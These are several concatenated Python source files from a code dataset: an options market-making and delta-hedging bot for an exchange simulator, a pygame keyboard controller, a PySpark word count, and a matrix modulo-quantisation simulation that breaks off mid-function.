sigma=volatility)\n    else:\n        raise Exception(f\"\"\"Got unexpected value for callput argument, should be 'call' or 'put' but was {callput}.\"\"\")\n\n    return option_value\n\n\ndef update_quotes(callput, option_id, theoretical_price, credit, volume, position_limit, tick_size):\n    \"\"\"\n    This function updates the quotes specified by <option_id>. 
We take the following actions in sequence:\n    - pull (remove) any current outstanding orders\n    - add credit to theoretical price and round to nearest tick size to create a set of bid/ask quotes\n    - calculate max volumes to insert so as to not pass the position_limit\n    - reinsert limit orders on those levels\n\n    Arguments:\n    option_id: str - Exchange Instrument ID of the option to trade\n    theoretical_price: float - Price to quote around\n    credit: float - Difference to subtract from/add to theoretical price to come to final bid/ask price\n    volume: int - Volume (# lots) of the inserted orders (given they do not breach position limits)\n    position_limit: int - Position limit (long/short) to avoid crossing\n    tick_size: float - Tick size of the quoted instrument\n    \"\"\"\n\n    # Print any new trades\n    \n    \n    trades = exchange.poll_new_trades(instrument_id=option_id)\n    for trade in trades:\n        print(f'- Last period, traded {trade.volume} lots in {option_id} at price {trade.price:.2f}, side: {trade.side}.')\n\n    # Pull (remove) all existing outstanding orders\n    orders = exchange.get_outstanding_orders(instrument_id=option_id)\n    \n    old_bid_volume = 0\n    old_ask_volume = 0\n    for order_id, order in orders.items():\n        print(f'- Deleting old {order.side} order in {option_id} for {order.volume} @ {order.price:8.2f}.')\n        if order.side == 'ask':\n            old_ask_volume = order.volume\n        elif order.side == 'bid':\n            old_bid_volume = order.volume\n        exchange.delete_order(instrument_id=option_id, order_id=order_id)\n    \n    if old_bid_volume > 20:\n        old_bid_volume = 20\n    if old_ask_volume > 20:\n        old_ask_volume = 20\n\n    # Calculate bid and ask price\n    bid_price = round_down_to_tick(theoretical_price - credit, tick_size)\n    ask_price = round_up_to_tick(theoretical_price + credit, tick_size)\n    \n    book = exchange.get_last_price_book(option_id)\n    if not book.bids or not book.asks:\n        bid_price = bid_price\n        ask_price = ask_price\n    else:\n        best_bid = round(float(book.bids[0].price),1)\n        print(\"best_bid: \", best_bid)\n        best_ask = round(float(book.asks[0].price),1)\n        print(\"best_ask: \", best_ask)\n        if best_bid > bid_price or bid_price > ask_price:\n            if best_bid + 0.1 < best_ask - 0.1:\n                bid_price = best_bid + 0.1\n            else:\n                bid_price = best_bid\n        if best_ask < ask_price or ask_price < bid_price:\n            if best_ask - 0.1 > best_bid +0.1:\n                ask_price = best_ask - 0.1\n            else:\n                ask_price = best_ask\n        \n        \n        if round(bid_price,1) == round(ask_price,1):\n            if best_bid != best_ask:\n                bid_price = best_bid\n                ask_price = best_ask\n            elif best_bid == best_ask:\n                bid_price = best_bid - 0.1\n                ask_price = best_ask + 0.1\n    # Calculate bid and ask volumes, taking into account the provided position_limit\n    position = exchange.get_positions()[option_id]\n    \n    if position > position_limit*0.5 or position < -position_limit*0.5:\n        if position > 0:\n            max_volume_to_buy = volume\n            max_volume_to_sell = position + 2*volume\n        else:\n            max_volume_to_buy = 2*volume - position\n            max_volume_to_sell = volume\n    else:\n        max_volume_to_buy = position_limit - position\n        max_volume_to_sell = position_limit + position\n    \n\n    bid_volume = min(volume+old_bid_volume, max_volume_to_buy)\n    ask_volume = min(volume+old_ask_volume, max_volume_to_sell)\n    \n    # Insert new limit orders\n    if callput == \"call\":\n        if bid_volume > 0 and not trade_would_breach_position_limit(option_id, volume, 'bid',position_limit = position_limit) and not force_delta_decrease:\n            \n            print(f'- Inserting bid limit order in {option_id} for {bid_volume} @ {bid_price:8.2f}.')\n            exchange.insert_order(instrument_id=option_id, \n
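                                  # these are passive resting quotes (order_type='limit'); the delta hedge in hedge_delta_position below crosses the book with 'ioc' orders instead\n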
price=bid_price, \n volume=bid_volume, \n side='bid', \n order_type='limit', \n )\n \n if ask_volume > 0 and not trade_would_breach_position_limit(option_id, volume, 'ask',position_limit = position_limit) and not force_delta_increase:\n \n print(f'- Inserting ask limit order in {option_id} for {ask_volume} @ {ask_price:8.2f}.')\n exchange.insert_order(instrument_id=option_id, \n price=ask_price, \n volume=ask_volume, \n side='ask', \n order_type='limit', \n )\n \n elif callput == \"put\":\n \n if bid_volume > 0 and not trade_would_breach_position_limit(option_id, volume, 'bid',position_limit = position_limit) and not force_delta_increase:\n \n print(f'- Inserting bid limit order in {option_id} for {bid_volume} @ {bid_price:8.2f}.')\n exchange.insert_order(instrument_id=option_id, \n price=bid_price, \n volume=bid_volume, \n side='bid', \n order_type='limit', \n )\n \n if ask_volume > 0 and not trade_would_breach_position_limit(option_id, volume, 'ask',position_limit = position_limit) and not force_delta_decrease:\n \n print(f'- Inserting ask limit order in {option_id} for {ask_volume} @ {ask_price:8.2f}.')\n exchange.insert_order(instrument_id=option_id, \n price=ask_price, \n volume=ask_volume, \n side='ask', \n order_type='limit', \n )\n\n\ndef hedge_delta_position(stock_id, options, stock_value):\n \"\"\"\n This function (once finished) hedges the outstanding delta position by trading in the stock.\n\n That is:\n - It calculates how sensitive the total position value is to changes in the underlying by summing up all\n individual delta component.\n - And then trades stocks which have the opposite exposure, to remain, roughly, flat delta exposure\n\n Arguments:\n stock_id: str - Exchange Instrument ID of the stock to hedge with\n options: List[dict] - List of options with details to calculate and sum up delta positions for\n stock_value: float - The stock value to assume when making delta calculations using Black-Scholes\n \"\"\"\n\n # A3: Calculate the delta position here\n positions = exchange.get_positions()\n \n total_delta_position = 0\n book = exchange.get_last_price_book(stock_id)\n if not book.bids or not book.asks:\n return\n else:\n best_bid = float(book.bids[0].price)\n best_ask = float(book.asks[0].price)\n \n for option in options:\n if option['callput'] == 'put':\n position = positions[option['id']]\n print(f\"- The current position in the option {option} is {position}.\")\n option_delta = calculate_option_delta(expiry_date=option['expiry_date'],\n strike = option['strike'], \n callput = option['callput'], \n stock_value=best_ask, \n interest_rate = 0.0, \n volatility = 3.0)\n elif option['callput'] == 'call':\n position = positions[option['id']]\n print(f\"- The current position in the option {option} is {position}.\")\n option_delta = calculate_option_delta(expiry_date=option['expiry_date'],\n strike = option['strike'], \n callput = option['callput'], \n stock_value=best_bid, \n interest_rate = 0.0, \n volatility = 3.0)\n \n delta_position = option_delta * position\n \n total_delta_position += delta_position\n \n print(f'- The current delta position in the stock {stock_id} is {total_delta_position}.')\n stock_position = positions[stock_id]\n print(f'- The current position in the stock {stock_id} is {stock_position}.')\n\n # A4: Implement the delta hedge here, staying mindful of the overall position-limit of 100, also for the stocks.\n \n book = exchange.get_last_price_book(stock_id)\n if not book.bids or not book.asks:\n return\n else:\n best_bid = 
float(book.bids[0].price)\n best_ask = float(book.asks[0].price)\n \n \n \n volume = int(round(total_delta_position,0)) + stock_position\n \n delta_pos = float(total_delta_position)\n if volume >= 0:\n stock_position_after = stock_position - volume\n if stock_position_after < -100:\n position_exceeded = -100 - stock_position_after\n volume = volume - position_exceeded\n side = 'ask'\n hedge_price = best_bid\n elif volume < 0:\n volume = -volume\n stock_position_after = stock_position + volume\n if stock_position_after > 100:\n position_exceeded = stock_position_after - 100\n volume = volume - position_exceeded\n side = 'bid'\n hedge_price = best_ask\n \n print(\"delta_pos: \", delta_pos)\n print(\"stock_position: \", stock_position)\n print(\"net_delta: \", (delta_pos + stock_position))\n \n if delta_pos + stock_position > 15 or delta_pos + stock_position < -15 or force_delta_decrease or force_delta_increase:\n \n if not trade_would_breach_position_limit(stock_id, volume, side) and volume != 0:\n print(f'''Inserting IOC {side} for {stock_id}: {volume:.0f} lot(s) at price {hedge_price:.2f}.''')\n exchange.insert_order(\n instrument_id=stock_id,\n price=hedge_price,\n volume=volume,\n side=side,\n order_type='ioc')\n else:\n print(\"- Not hedging.\")\n \n else:\n print(f'- Not hedging.')\n return (delta_pos + stock_position)\n \n \ndef options_delta_calc(options_list):\n delta_sum = 0\n for option in options_list:\n time_to_expiry = calculate_current_time_to_date(option['expiry_date'])\n strike = option['strike']\n interest_rate = 0.0\n volatility = 3.0\n if option['callput'] == 'call':\n option_delta = call_delta(S=stock_value, K=strike, T=time_to_expiry, r=interest_rate, sigma=volatility)\n elif option['callput'] == 'put':\n option_delta = put_delta(S=stock_value, K=strike, T=time_to_expiry, r=interest_rate, sigma=volatility)\n option['delta'] = option_delta\n delta_sum += option_delta\n \n delta_sum = round(delta_sum,2) \n \n if delta_sum < 0:\n delta_sum += 0.8\n elif delta_sum > 0:\n delta_sum -= 0.8\n\n if delta_sum > 0:\n return 'positive', delta_sum\n elif delta_sum < 0:\n return 'negative', delta_sum\n\n\n# A2: Not all the options have been entered here yet, include all of them for an easy improvement\nbid_count = 0\n\nSTOCK_ID = 'BMW'\nOPTIONS = [\n {'id': 'BMW-2021_12_10-050C', 'expiry_date': dt.datetime(2021, 12, 10, 12, 0, 0), 'strike': 50, 'callput': 'call', 'last_ask': 0.0, 'last_bid': 0.0, 'delta': 0.0, 'position_limit': 100},\n {'id': 'BMW-2021_12_10-050P', 'expiry_date': dt.datetime(2021, 12, 10, 12, 0, 0), 'strike': 50, 'callput': 'put', 'last_ask': 0.0, 'last_bid': 0.0, 'delta': 0.0, 'position_limit': 100},\n {'id': 'BMW-2022_01_14-050C', 'expiry_date': dt.datetime(2022, 1, 14, 12, 0, 0), 'strike': 50, 'callput': 'call', 'last_ask': 0.0, 'last_bid': 0.0, 'delta': 0.0, 'position_limit': 100},\n {'id': 'BMW-2022_01_14-050P', 'expiry_date': dt.datetime(2022, 1, 14, 12, 0, 0), 'strike': 50, 'callput': 'put', 'last_ask': 0.0, 'last_bid': 0.0, 'delta': 0.0, 'position_limit': 100},\n {'id': 'BMW-2021_12_10-075C', 'expiry_date': dt.datetime(2021, 12, 10, 12, 0, 0), 'strike': 75, 'callput': 'call', 'last_ask': 0.0, 'last_bid': 0.0, 'delta': 0.0, 'position_limit': 100},\n {'id': 'BMW-2021_12_10-075P', 'expiry_date': dt.datetime(2021, 12, 10, 12, 0, 0), 'strike': 75, 'callput': 'put', 'last_ask': 0.0, 'last_bid': 0.0, 'delta': 0.0, 'position_limit': 100},\n {'id': 'BMW-2022_01_14-075C', 'expiry_date': dt.datetime(2022, 1, 14, 12, 0, 0), 'strike': 75, 'callput': 'call', 'last_ask': 
0.0, 'last_bid': 0.0, 'delta': 0.0, 'position_limit': 100},\n    {'id': 'BMW-2022_01_14-075P', 'expiry_date': dt.datetime(2022, 1, 14, 12, 0, 0), 'strike': 75, 'callput': 'put', 'last_ask': 0.0, 'last_bid': 0.0, 'delta': 0.0, 'position_limit': 100},\n    {'id': 'BMW-2021_12_10-100C', 'expiry_date': dt.datetime(2021, 12, 10, 12, 0, 0), 'strike': 100, 'callput': 'call', 'last_ask': 0.0, 'last_bid': 0.0, 'delta': 0.0, 'position_limit': 100},\n    {'id': 'BMW-2021_12_10-100P', 'expiry_date': dt.datetime(2021, 12, 10, 12, 0, 0), 'strike': 100, 'callput': 'put', 'last_ask': 0.0, 'last_bid': 0.0, 'delta': 0.0, 'position_limit': 100},\n    {'id': 'BMW-2022_01_14-100C', 'expiry_date': dt.datetime(2022, 1, 14, 12, 0, 0), 'strike': 100, 'callput': 'call', 'last_ask': 0.0, 'last_bid': 0.0, 'delta': 0.0, 'position_limit': 100},\n    {'id': 'BMW-2022_01_14-100P', 'expiry_date': dt.datetime(2022, 1, 14, 12, 0, 0), 'strike': 100, 'callput': 'put', 'last_ask': 0.0, 'last_bid': 0.0, 'delta': 0.0, 'position_limit': 100},\n]\n\n\nfor option in OPTIONS:\n    book = exchange.get_last_price_book(option['id'])\n    if not book.bids or not book.asks:\n        continue\n    else:\n        best_bid = float(book.bids[0].price)\n        best_ask = float(book.asks[0].price)\n    \n    option['last_ask'] = best_ask\n    option['last_bid'] = best_bid\n    \nwhile True:\n    print(f'')\n    print(f'-----------------------------------------------------------------')\n    print(f'TRADE LOOP ITERATION ENTERED AT {str(dt.datetime.now()):18s} UTC.')\n    print(f'-----------------------------------------------------------------')\n\n    stock_value = get_midpoint_value(STOCK_ID)\n    \n    delta_sign, delta_sum = options_delta_calc(OPTIONS)\n    \n    if delta_sign == 'positive':\n        delta_position_change = int(round(delta_sum/6,0)*100)\n        for option in OPTIONS:\n            if option['delta'] > 0:\n                option['position_limit'] -= delta_position_change\n                delta_sum -= delta_position_change\n    elif delta_sign == 'negative':\n        delta_position_change = int(round(delta_sum/6,0)*100)\n        for option in OPTIONS:\n            if option['delta'] < 0:\n                option['position_limit'] += delta_position_change\n                delta_sum -= delta_position_change\n    \n    if stock_value is None:\n        print('Empty stock order book on bid or ask-side, or both, unable to update option prices.')\n        time.sleep(4)\n        continue\n    \n    book_BMW = exchange.get_last_price_book(STOCK_ID)\n    best_ask_BMW = round(float(book_BMW.asks[0].price),1)\n    best_bid_BMW = round(float(book_BMW.bids[0].price),1)\n    \n    max_delta = 0.0\n    for option in OPTIONS:\n        if option['delta'] < 0:\n            if (-option['delta']) > max_delta:\n                max_delta = -option['delta']\n        else:\n            if option['delta'] > max_delta:\n                max_delta = option['delta']\n    \n    for option in OPTIONS:\n        \n        trades = exchange.poll_new_trades(option['id'])\n        a_list = []\n        for t in trades:\n            print(f\"[TRADED {t.instrument_id}] price({t.price}), volume({t.volume}), side({t.side})\")\n            a_list.append([t.instrument_id, t.price, t.volume, str(t.side)])\n        \n        print(a_list)\n        for item in a_list:\n            side = item[3]\n            if side == 'bid':\n                last_bid = item[1]\n                option['last_bid'] = last_bid\n            elif side == 'ask':\n                last_ask = item[1]\n                option['last_ask'] = last_ask\n        \n        print(f\"\\nUpdating instrument {option['id']}\")\n        \n        expiry_date = option['expiry_date']\n        strike = option['strike']\n        callput = option['callput']\n        interest_rate = 0.0\n        volatility = 3.0\n        option_limit = option['position_limit']\n        \n        \n\n        theoretical_value = calculate_theoretical_option_value(expiry_date=expiry_date,\n                                                               strike=strike,\n                                                               callput=callput,\n                                                               stock_value=stock_value,\n                                                               interest_rate=interest_rate,\n
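                                                               # stock_value is the stock midpoint fetched above; volatility is this script's fixed 3.0 assumption\n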
volatility=volatility)\n\n        # A1: Here we ask a fixed credit of 15cts, regardless of what the market circumstances are or which option\n        # we're quoting. That can be improved. Can you think of something better?\n        time_to_expiry = calculate_current_time_to_date(expiry_date)\n        if callput == 'call':\n            option_delta = call_delta(S=stock_value, K=strike, T=time_to_expiry, r=interest_rate, sigma=volatility)\n            option_vega = call_vega(S=stock_value, K=strike, T=time_to_expiry, r = interest_rate, sigma = volatility)\n        elif callput == 'put':\n            option_delta = put_delta(S=stock_value, K=strike, T=time_to_expiry, r=interest_rate, sigma=volatility)\n            option_vega = put_vega(S=stock_value, K=strike, T=time_to_expiry, r=interest_rate, sigma=volatility)\n        else:\n            raise Exception(f\"\"\"Got unexpected value for callput argument, should be 'call' or 'put' but was {callput}.\"\"\")\n        \n        if theoretical_value > option['strike']:\n            credit1 = theoretical_value - option['strike'] - 0.1\n        elif theoretical_value < option['strike']:\n            credit1 = option['strike'] - theoretical_value - 0.1\n        else:\n            credit1 = 0\n        \n        book = exchange.get_last_price_book(option['id'])\n        if len(book.bids)<2 or len(book.asks)<2:\n            credit2 = 0\n        else:\n            best_bid = float(book.bids[1].price)\n            best_ask = float(book.asks[1].price)\n            best_bid_vol = int(book.bids[1].volume)\n            best_ask_vol = int(book.asks[1].volume)\n            \n            if theoretical_value > best_bid:\n                diff_bid = theoretical_value - best_bid\n            else:\n                diff_bid = best_bid - theoretical_value\n            \n            if theoretical_value < best_ask:\n                diff_ask = best_ask - theoretical_value\n            else:\n                diff_ask = theoretical_value - best_ask\n            \n            if diff_bid < diff_ask:\n                credit2 = diff_bid\n            else:\n                credit2 = diff_ask\n        \n        positions = exchange.get_positions()\n        position = positions[option['id']]\n        \n        \n        \n        if credit1 > credit2:\n            credit = credit2\n        else:\n            credit = credit1 \n        \n        \n        delta_multiplier = option_delta/max_delta\n        \n        if delta_multiplier < 0:\n            delta_multiplier = -delta_multiplier\n        \n        credit = credit*0.4 + 0.6*credit*delta_multiplier\n        # A5: Here we are inserting a volume of 20, only taking into account the position limit of 100, are there better\n        # choices?\n        print(f\"{option['id']} limit is {option_limit}.\")\n        update_quotes(callput=option['callput'],\n                      option_id=option['id'],\n                      theoretical_price=theoretical_value,\n                      credit=credit,\n                      volume=20,\n                      position_limit=option_limit,\n                      tick_size=0.10)\n\n        # Wait 1/10th of a second to avoid breaching the exchange frequency limit\n        time.sleep(0.10)\n    \n\n    print(f'\\nHedging delta position')\n    \n    net_delta = hedge_delta_position(STOCK_ID, OPTIONS, stock_value)\n    stock_position = positions[STOCK_ID]\n    print(stock_position)\n    if stock_position >= 80:\n        print(\"force_delta_increase = True\")\n        force_delta_increase = True\n    elif stock_position > -80:\n        print(\"force_delta_decrease = False confirmed.\")\n        force_delta_decrease = False\n    if stock_position <= -80:\n        print(\"force_delta_decrease = True\")\n        force_delta_decrease = True\n    elif stock_position < 80:\n        print(\"force_delta_increase = False confirmed.\")\n        force_delta_increase = False\n    \n    print(f'Sleeping for 2 seconds.')\n    time.sleep(2)\n", "sub_path": "market_makingv0.0.1.py", "file_name": "market_makingv0.0.1.py", "file_ext": "py", "file_size_in_byte": 26093, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "optibook.synchronous_client.Exchange", "line_number": 13, "usage_type": "call"}, {"api_name": "logging.getLogger", 
"line_number": 16, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 46, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 53, "usage_type": "call"}, {"api_name": "libs.calculate_current_time_to_date", "line_number": 83, "usage_type": "call"}, {"api_name": "black_scholes.call_value", "line_number": 86, "usage_type": "call"}, {"api_name": "black_scholes.put_value", "line_number": 88, "usage_type": "call"}, {"api_name": "libs.calculate_current_time_to_date", "line_number": 106, "usage_type": "call"}, {"api_name": "black_scholes.call_delta", "line_number": 109, "usage_type": "call"}, {"api_name": "black_scholes.put_delta", "line_number": 111, "usage_type": "call"}, {"api_name": "libs.calculate_current_time_to_date", "line_number": 364, "usage_type": "call"}, {"api_name": "black_scholes.call_delta", "line_number": 369, "usage_type": "call"}, {"api_name": "black_scholes.put_delta", "line_number": 371, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 393, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 394, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 395, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 396, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 397, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 398, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 399, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 400, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 401, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 402, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 403, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 404, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 422, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 422, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 444, "usage_type": "call"}, {"api_name": "libs.calculate_current_time_to_date", "line_number": 498, "usage_type": "call"}, {"api_name": "black_scholes.call_delta", "line_number": 500, "usage_type": "call"}, {"api_name": "black_scholes.call_vega", "line_number": 501, "usage_type": "call"}, {"api_name": "black_scholes.put_delta", "line_number": 503, "usage_type": "call"}, {"api_name": "black_scholes.put_vega", "line_number": 504, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 568, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 590, "usage_type": "call"}]} +{"seq_id": "79489850", "text": "import pygame\nimport sys\nfrom pygame.locals import *\nclass Controller ():\n \n def __init__(self):\n pygame.key.set_repeat(30, 50)\n self.bombkey_down = 0;\n def handle_keyboard_input(self, player):\n\n if player.state.alive is False: return\n\n self = self\n# @todo: Pruefen, ob diese Methode nicht besser zum Spiel passt !!!\n# speichert die gedrueckten Tasten im Dictionary ,\n# kann geholt werden mit actionkeys[pygame.K_LEFT], etc.\n# actionkeys = pygame.key.get_pressed()\n# print actionkeys\n\n for e in pygame.event.get():\n \n if e.type == QUIT:\n player.game.gameRunning = False\n # @todo: hier eine spiel beenden methode aufrufen\n pygame.quit()\n sys.exit()\n elif e.type == KEYDOWN:\n \n if e.key == K_ESCAPE:\n player.game.gameRunning = False\n pygame.quit()\n sys.exit()\n \n elif e.key == K_SPACE:\n# print 
player.game.debug\n                    if player.state.standing or player.state.is_at_ladder:\n                        \n                        if not player.state.jumping:\n                            player.movement[1] -= player.speed * 2.5\n                            player.state.change_to_jumping()\n#                            \n                    \n                elif e.key == K_UP:\n                    if player.state.is_at_ladder:\n                        player.movement[1] = -player.speed\n                        player.face_up()\n                    else:\n                        if player.state.standing and not player.state.jumping and not player.state.falling:\n#                        if player.state.standing and not player.state.falling:\n                            player.movement[1] -= player.speed * 2.5\n                            player.state.change_to_jumping()\n                \n                elif e.key == K_DOWN:\n                    if player.state.is_at_ladder:\n                        player.movement[1] = player.speed\n                        player.face_down()\n                        player.state.change_to_climbing()\n                    elif player.state.standing and self.bombkey_down < pygame.time.get_ticks():\n                        player.placeTNT()\n                        self.bombkey_down = pygame.time.get_ticks() + 1500;\n                \n                elif e.key == K_LEFT:\n                    player.face_left()\n                    player.state.movement_key_pressed = True\n                    \n                    if player.state.falling and not player.state.jumping:\n                        player.movement[0] = -player.speed / 2\n                    else:\n                        player.movement[0] = -player.speed\n                    \n                    if not player.state.can_walk_left:\n#                        print \"cannot walk left\"\n                        player.movement[0] = 0\n                    \n                    \n                    \n                elif e.key == K_RIGHT:\n                    player.face_right()\n                    player.state.movement_key_pressed = True\n                    \n                    if player.state.falling and not player.state.jumping:\n                        player.movement[0] = player.speed / 2\n                    else:\n                        player.movement[0] = player.speed\n                    \n                    if not player.state.can_walk_right:\n#                        print \"cannot walk right\"\n                        player.movement[0] = 0\n                    \n                    \n                    \n            elif e.type == KEYUP:\n                if e.key == K_UP or e.key == K_DOWN:\n                    player.movement[1] = 0\n                \n                elif e.key == K_LEFT or e.key == K_RIGHT:\n                    player.movement[0] = 0\n                    player.state.movement_key_pressed = False\n\n    \n", "sub_path": "src/controller.py", "file_name": "controller.py", "file_ext": "py", "file_size_in_byte": 3970, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pygame.key.set_repeat", "line_number": 7, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 7, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 25, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 26, "usage_type": "call"}, {"api_name": "pygame.quit", "line_number": 31, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 32, "usage_type": "call"}, {"api_name": "pygame.time.get_ticks", "line_number": 58, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 58, "usage_type": "attribute"}, {"api_name": "pygame.time.get_ticks", "line_number": 60, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 60, "usage_type": "attribute"}]} +{"seq_id": "161978271", "text": "from pyspark import SparkContext, SparkConf\n\nif __name__ == \"__main__\":\n    # create SparkContext, which is imported from pyspark API\n    # this context is the entry point to Spark Core\n    # our Spark App is word count\n    # will run Spark app on embedded Spark instance on our local box, which could use up to 3 cores of our CPU\n    # sc.setLogLevel(\"ERROR\")\n    # above not necessary if you change the Spark config files\n    conf = SparkConf().setAppName(\"word count\").setMaster(\"local[3]\")\n    sc = SparkContext(conf = conf)\n\n    # load word count file as an RDD (resilient distributed dataset)\n    lines = sc.textFile(\"in/word_count.text\")\n\n    #split article into words, whitespace as 
delimiter\n words = lines.flatMap(lambda line: line.split(\" \"))\n\n #calculate occurrence of each word\n wordCounts = words.countByValue()\n\n #print out the results\n for word, count in wordCounts.items():\n print(\"{} : {}\".format(word, count))\n", "sub_path": "rdd/WordCount.py", "file_name": "WordCount.py", "file_ext": "py", "file_size_in_byte": 942, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pyspark.SparkConf", "line_number": 10, "usage_type": "call"}, {"api_name": "pyspark.SparkContext", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "304128210", "text": "#!/usr/bin/python3\r\n'''\r\nthis script is:\r\n generating all combinations of A\r\n in loop:\r\n randomizing data det\r\n getting few samples from data\r\n for each A:\r\n deciding by tails of the samples if A is good\r\n deciding by A*cov*A if A is good\r\n checking errors\r\n'''\r\nimport pandas as pd\r\nimport numpy as np\r\nimport itertools,random\r\nfrom optparse import OptionParser\r\n\r\nparser = OptionParser()\r\nparser.add_option(\"-n\",\"\", dest=\"samples\", type=\"int\", default=2,help='number of dots X2 because you have x and y. for example 1000. you better use 5')\r\nparser.add_option(\"-s\",\"\", dest=\"simulations\", type=\"int\", default=10,help='number of simulations, for example 50. you better use 400')\r\nparser.add_option(\"-b\",\"\", dest=\"bins\", type=\"int\", default=200,help='number of bins, for example 200')\r\nparser.add_option(\"-t\",\"\", dest=\"threshold\", type=\"float\", default=2.5,help='this threshold is for deciding if data is U or N, by checking if there are samples over the threshold. this defines the tail size. bigger number will result of more detecting output as N')\r\nparser.add_option(\"-m\",\"\", dest=\"A_max_num\", type=\"int\", default=2,help='A max number for example for 2 you can get [[-2,1],[2,0]]. for number 10, you will get 189,776 options at A. at 5 you will have 13608. . 
you better use 10')\r\nparser.add_option(\"-o\", dest=\"different_cov\", help=\"if set, using same cov matrix for all simulations\", default=False, action=\"store_true\")\r\n(u,args)=parser.parse_args()\r\n\r\nif 0:\r\n    u.samples=10\r\n    u.A_max_num=8\r\n    u.threshold=1.3\r\n\r\ndef rand_cov():\r\n    m=np.matrix(np.random.normal(0,1,[2,2]))\r\n    m=m.T*m\r\n    '''now changing the cov det to 1 but you can skip it'''\r\n    # m=m/np.sqrt(np.linalg.det(m))\r\n    m = m / np.random.uniform(3*np.sqrt(np.linalg.det(m)), np.sqrt(np.linalg.det(m)))\r\n    return np.mat(m)\r\n\r\ndef rand_A(max_det):\r\n    done=0\r\n    while not done:\r\n        A=np.random.randint(-10,10,[2,2])\r\n        if np.abs(np.linalg.det(A))<max_det and np.abs(np.linalg.det(A))>0.5:\r\n            done=1\r\n    return np.mat(A)\r\n\r\ndef hist_plot(df,title):\r\n    sns.jointplot(data=df, x=\"X\", y=\"Y\",xlim=[-4.4,4.4],ylim=[-4.4,4.4])#,ax=axes.pop())#, kind=\"kde\"\r\n    plt.subplots_adjust(top=0.9)\r\n    plt.suptitle(title)\r\n\r\n\r\n\r\n\r\n\r\ndef random_data(cov,samples):\r\n    xy=pd.DataFrame(np.random.multivariate_normal([0,0], cov, samples),columns=['X','Y'])\r\n    return xy\r\ndef sign_mod(xy,modulo_size_edge_to_edge):\r\n    xy=xy.copy()\r\n    xy+=modulo_size_edge_to_edge/2.0\r\n    xy=xy.mod(modulo_size_edge_to_edge)-modulo_size_edge_to_edge/2.0\r\n    xy.columns=['X','Y']\r\n    return xy\r\ndef quantize(xy,modulo_size_edge_to_edge,number_of_bins):\r\n    hlf=modulo_size_edge_to_edge/2.0\r\n    bins = np.linspace(-hlf, hlf, number_of_bins+1)\r\n    center = (bins[:-1] + bins[1:]) / 2  # which is also (q[:-1]+(q[1]-q[0])/2)\r\n    bins[0] = -float(\"inf\")  # otherwise the values outside the bins will get NaN\r\n    bins[-1] = float(\"inf\")\r\n    df=pd.DataFrame()\r\n    df['X'] = pd.cut(xy.X, bins, labels=center).astype(float)\r\n    df['Y'] = pd.cut(xy.Y, bins, labels=center).astype(float)\r\n    return df\r\n\r\n\r\n\r\nmodulo_size_edge_to_edge=8.8\r\nsamples=u.samples\r\nbins=u.bins\r\nthreshold=u.threshold\r\n\r\n# cases=\"----inputs cases----\\nA:\\n%s\\ncov:\\n%s\\nmodulo_size_edge_to_edge:\\n%s\\nsamples:\\n%s\"%(str(A),str(cov),str(modulo_size_edge_to_edge),str(samples))\r\n# print (cases)\r\n# print (\"inputs:\")\r\n# print (\"A:\\n\"+str(A))\r\n# print (\"cov:\\n\"+str(cov))\r\n# print (\"modulo_size_edge_to_edge:\\n\"+str(modulo_size_edge_to_edge))\r\n# print (\"samples:\\n\"+str(samples))\r\n\r\n\r\ndef run_all_A_on_cov(cov,all_A):\r\n    misdetecting_N_as_U = 0\r\n    misdetecting_U_as_N = 0\r\n    good_A = 0\r\n    good_N_detection = 0\r\n\r\n    df_original = random_data(cov, u.samples)\r\n    df_mod1=sign_mod(df_original,modulo_size_edge_to_edge)\r\n    df_quant=quantize(df_mod1,modulo_size_edge_to_edge,bins)\r\n    results=[]\r\n    for A in all_A:\r\n        df_A=df_quant.dot(A)\r\n        df_A.columns=['X','Y']\r\n        df_mod2=sign_mod(df_A,modulo_size_edge_to_edge)\r\n        df_AI=df_mod2.dot(A.I)\r\n        df_AI.columns=['X','Y']\r\n\r\n        output_cov=A.T*cov*A\r\n        # xy_mse=pd.DataFrame([(df_AI-df_original).X.var(),(df_AI-df_original).Y.var()],index=['X','Y'],columns=[bins]).T\r\n        true_good_A=(output_cov[0,0]<1.1 and output_cov[1,1]<1.1)\r\n        good_A_by_tail=sum(pd.cut(df_mod2.head(u.samples).stack().values, [-float(\"inf\"), -threshold, threshold, float(\"inf\")], labels=[2, 0, 1]))==0\r\n        good_A+=true_good_A\r\n        if true_good_A==good_A_by_tail and true_good_A:\r\n            good_N_detection+=1\r\n        if true_good_A!=good_A_by_tail:\r\n            misdetecting_N_as_U+=true_good_A\r\n            misdetecting_U_as_N+=good_A_by_tail\r\n        if 0:\r\n            print(output_cov.round(10))\r\n            